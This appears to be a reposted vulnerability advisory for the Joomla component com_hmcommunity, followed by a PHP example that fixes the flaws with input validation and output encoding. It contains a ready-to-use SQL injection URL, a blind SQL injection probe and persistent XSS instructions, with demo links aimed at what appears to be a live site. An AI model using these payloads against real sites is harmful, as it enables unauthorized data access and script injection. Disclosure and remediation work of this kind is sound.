Title: Joomla Component com_hmcommunity Multiple Vulnerabilities
Software: Joomla
: http://joomlaextensions.co.in/product/HM-Community
Author: 599eme Man Flouf@live.fr
#
# [Renew]
#
# [+] Defect Analysis
#
# [+] SQL
#
#-http://www.bkjia.com/index.php?option=com_hmcommunity&view=fnd_home&id=[NB] union select all 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 --
#
# [+] Blind SQL
#
#-http://www.bkjia.com//index.php?option=com_hmcommunity&view=fnd_home&id=155 and @ version = 5
#
# [+] Persistent XSS
#
#-The XSS is on the profile. You have to create an account and put your code in inputs.
#
# [+] Demo
#
#-Create an account and look at this profile: http://www.bkjia.com/index.php?option=com_hmcommunity&view=fnd_profile&uid=155
#
# [Renew]
#
######################################## ######################################## #########################
www.2cto.com solution:
It's nothing more than injection and XSS. Filter
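
One way to apply the filtering that the solution line refers to, as an added example (not code from the component or from the original advisory). The `profiles` table, its columns and the functions `parse_id`, `load_profile` and `render_profile` are hypothetical, and an in-memory SQLite database reached through PDO stands in for the site's database layer.

```php
<?php
// Added example: hypothetical names throughout (profiles table, parse_id,
// load_profile, render_profile). In-memory SQLite stands in for the site's DB.

// Accept only a plain positive integer for id/uid; anything else is rejected.
function parse_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bind the validated id as a typed parameter instead of concatenating it.
function load_profile(PDO $db, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT uid, name, about FROM profiles WHERE uid = :uid');
    $stmt->bindValue(':uid', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Encode stored profile fields at output time so markup is shown as text.
function render_profile(array $p): string
{
    $e = fn($s) => htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h1>' . $e($p['name']) . '</h1><p>' . $e($p['about']) . '</p>';
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE profiles (uid INTEGER PRIMARY KEY, name TEXT, about TEXT)');
$ins = $db->prepare('INSERT INTO profiles (uid, name, about) VALUES (?, ?, ?)');
$ins->execute([155, 'Alice', '<b>bold</b> & "quoted"']);

// Constructed requests: a clean id, then two with trailing SQL text.
foreach (['155', '155 and 1=1', '155 union select 1'] as $raw) {
    $p = load_profile($db, $raw);
    echo str_pad($raw, 20), ' => ', $p === null ? 'rejected' : render_profile($p), "\n";
}
```

The integer check handles the `id` and `uid` parameters named in the advisory, and the output encoding handles profile fields that were stored before any input filter existed.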